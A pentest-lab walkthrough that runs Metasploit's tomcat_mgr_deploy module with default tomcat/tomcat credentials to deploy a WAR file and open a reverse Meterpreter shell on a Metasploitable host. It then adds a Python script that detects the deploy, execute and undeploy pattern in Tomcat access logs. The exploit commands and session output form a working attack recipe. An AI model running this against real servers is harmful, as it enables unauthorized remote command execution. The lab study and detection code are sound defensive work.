If the administrator username and password for the Tomcat /manager application are known, a crafted WAR file can be deployed through it to obtain command execution with the privileges of the Tomcat server process.
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > run
[*] Started reverse handler on 192.168.1.113:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6476 bytes as XLwr0WTDQwQK4R7ahMzSCdcKSA.war ...
[*] Executing /XLwr0WTDQwQK4R7ahMzSCdcKSA/RPba2ccc2dFiBsijOiDZGBA9V04A0U.jsp...
[*] Undeploying XLwr0WTDQwQK4R7ahMzSCdcKSA ...
[*] Sending stage (30355 bytes) to 192.168.1.111
[*] Meterpreter session 4 opened (192.168.1.113:4444 -> 192.168.1.111:51992) at 2014-08-01 00:43:41 -0400
meterpreter > getuid
Server username: tomcat55
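The session above leaves a characteristic trace in the Tomcat access log: an authenticated deploy request to the manager, a request into the freshly created context (the random-named .jsp), and an undeploy of the same context seconds later. The following detection script is an added example and is not part of the original page or of Metasploit; it assumes Tomcat writes the common log format (the AccessLogValve default) and accepts both the old /manager/deploy path the module's PATH option describes and the /manager/text/deploy path used by later Tomcat releases. The log lines are constructed to mirror the output above, not a real capture.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Tomcat access-log sample in common log format. The client
# address and context names mirror the Metasploit session above; the
# last two lines are a legitimate deployment for contrast.
SAMPLE_LOG = """\
192.168.1.113 - - [01/Aug/2014:00:43:39 -0400] "GET /manager/html HTTP/1.1" 401 -
192.168.1.113 - tomcat [01/Aug/2014:00:43:40 -0400] "PUT /manager/deploy?path=/XLwr0WTDQwQK4R7ahMzSCdcKSA HTTP/1.1" 200 -
192.168.1.113 - - [01/Aug/2014:00:43:41 -0400] "GET /XLwr0WTDQwQK4R7ahMzSCdcKSA/RPba2ccc2dFiBsijOiDZGBA9V04A0U.jsp HTTP/1.1" 200 -
192.168.1.113 - tomcat [01/Aug/2014:00:43:41 -0400] "GET /manager/undeploy?path=/XLwr0WTDQwQK4R7ahMzSCdcKSA HTTP/1.1" 200 -
10.0.0.5 - admin [01/Aug/2014:09:15:02 -0400] "PUT /manager/text/deploy?path=/shop HTTP/1.1" 200 -
10.0.0.7 - - [01/Aug/2014:09:20:11 -0400] "GET /shop/index.jsp HTTP/1.1" 200 1234
"""

# Common log format: client ident user [timestamp] "METHOD URI PROTO" status bytes
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Manager text-interface commands; /text/ is optional so older layouts match too.
DEPLOY_RE = re.compile(r'^/manager(?:/text)?/deploy\?(?:.*&)?path=(?P<ctx>/[^&\s]+)')
UNDEPLOY_RE = re.compile(r'^/manager(?:/text)?/undeploy\?(?:.*&)?path=(?P<ctx>/[^&\s]+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(lines):
    """Turn access-log lines into event dicts; unparseable lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "client": m["client"], "user": m["user"],
            "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "uri": m["uri"], "status": int(m["status"]),
        })
    return events


def list_manager_deploys(lines):
    """Every successful manager deploy, as (client, user, context); worth
    reviewing on its own, since deploys should come only from known admins."""
    out = []
    for ev in parse(lines):
        d = DEPLOY_RE.match(ev["uri"])
        if d and ev["status"] == 200:
            out.append((ev["client"], ev["user"], d["ctx"]))
    return out


def detect_deploy_chains(lines, window=timedelta(seconds=120)):
    """Flag (client, context) pairs where one client deploys a context, requests
    something inside it, and undeploys it again within `window`: the
    deploy / execute / undeploy pattern the session above produces."""
    deploys = {}  # (client, ctx) -> deploy event
    hits = defaultdict(lambda: {"executed": False, "undeployed": False})
    for ev in parse(lines):
        if ev["status"] != 200:
            continue
        d = DEPLOY_RE.match(ev["uri"])
        if d:
            deploys[(ev["client"], d["ctx"])] = ev
            continue
        u = UNDEPLOY_RE.match(ev["uri"])
        if u:
            key = (ev["client"], u["ctx"])
            if key in deploys and ev["ts"] - deploys[key]["ts"] <= window:
                hits[key]["undeployed"] = True
            continue
        # Any other hit inside a recently deployed context, from the same client
        for (client, ctx), dep in deploys.items():
            if (ev["client"] == client and ev["uri"].startswith(ctx + "/")
                    and ev["ts"] - dep["ts"] <= window):
                hits[(client, ctx)]["executed"] = True
    findings = []
    for key, flags in hits.items():
        if flags["executed"] and flags["undeployed"]:
            findings.append({
                "client": key[0], "context": key[1],
                "user": deploys[key]["user"],
                "deployed_at": deploys[key]["ts"].isoformat(),
            })
    return findings


if __name__ == "__main__":
    for f in detect_deploy_chains(SAMPLE_LOG.splitlines()):
        print("suspicious manager deploy chain:", f)
```

Run against the sample, the script reports one chain (client 192.168.1.113, user tomcat, the random context) and stays quiet about the /shop deployment, which is never undeployed and is browsed from a different host. Unusual deploys that do not complete the chain still show up via list_manager_deploys, which is the list to compare against the accounts that are actually allowed the manager-script role.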
References:
http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/
http://web.nmsu.edu/~alejbaca/portfolio/senior_project/2-Metasploitable%202%20Exploitability%20Guide%20_%20SecurityStreet.pdf